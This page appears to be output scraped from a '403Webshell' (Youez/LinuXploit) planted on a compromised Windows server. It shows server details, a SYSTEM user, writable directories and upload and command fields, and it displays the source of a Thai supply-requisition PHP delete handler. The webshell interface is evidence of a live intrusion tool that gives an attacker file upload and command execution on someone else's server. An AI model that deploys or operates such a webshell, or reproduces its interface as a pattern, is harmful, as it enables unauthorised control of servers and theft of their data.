403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/supply_system/requisitions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/supply_system/requisitions/action_requisition_delete.php
<?php
include_once __DIR__ . '/../config.php';
include_once __DIR__ . '/../functions.php';
include_once __DIR__ . '/../includes/auth_check.php';
// requireRole(['department']); // Ensure only the requester can delete

$message = '';
$message_type = 'danger';
$req_id = isset($_GET['id']) ? intval($_GET['id']) : 0;
$user_id = getUserData('user_id'); // Get current user ID

if ($req_id > 0 && $user_id > 0) {

    // --- Verify Permission and Status ---
    $sql_check = "SELECT id, status, requisition_no FROM requisitions WHERE id = $req_id AND requested_by = $user_id";
    $result_check = mysqli_query($conn, $sql_check);

    if ($result_check && $req = mysqli_fetch_assoc($result_check)) {
        // Check if status allows deletion
        if ($req['status'] == 'pending' || $req['status'] == 'head_rejected') {
            // --- Safe to delete ---
            mysqli_begin_transaction($conn);
            try {
                // 1. Delete details first (due to foreign key constraint from requisitions table)
                $sql_delete_details = "DELETE FROM requisition_details WHERE requisition_id = $req_id";
                if (!mysqli_query($conn, $sql_delete_details)) {
                     throw new Exception("ไม่สามารถลบรายการย่อยของคำขอได้: " . mysqli_error($conn));
                }

                // 2. Delete the main requisition record
                $sql_delete_req = "DELETE FROM requisitions WHERE id = $req_id";
                if (!mysqli_query($conn, $sql_delete_req)) {
                     throw new Exception("ไม่สามารถลบคำขอหลักได้: " . mysqli_error($conn));
                }

                // If both deletes were successful
                mysqli_commit($conn);
                $message = "ลบคำขอเบิก '" . htmlspecialchars($req['requisition_no']) . "' เรียบร้อยแล้ว";
                $message_type = 'success';

            } catch (Exception $e) {
                mysqli_rollback($conn);
                $message = $e->getMessage();
                $message_type = 'danger';
            }

        } else {
            $message = "ไม่สามารถลบคำขอเบิก '" . htmlspecialchars($req['requisition_no']) . "' ได้ เนื่องจากสถานะปัจจุบันคือ '" . $req['status'] . "' (ต้องเป็น pending หรือ head_rejected เท่านั้น)";
            $message_type = 'warning';
        }
        mysqli_free_result($result_check);
    } else {
        $message = "ไม่พบคำขอเบิก ID: $req_id หรือคุณไม่ใช่ผู้สร้างคำขอนี้";
        $message_type = 'danger';
    }
    mysqli_close($conn);

} else {
    $message = "ข้อมูล ID สำหรับการลบไม่ถูกต้อง หรือยังไม่ได้เข้าระบบ";
    $message_type = 'danger';
}

// --- Redirect back with message ---
$_SESSION['message'] = $message;
$_SESSION['message_type'] = $message_type;
redirect('list_my.php'); // Redirect back to the user's requisition list

?>

Youez - 2016 - github.com/yon3zu
LinuXploit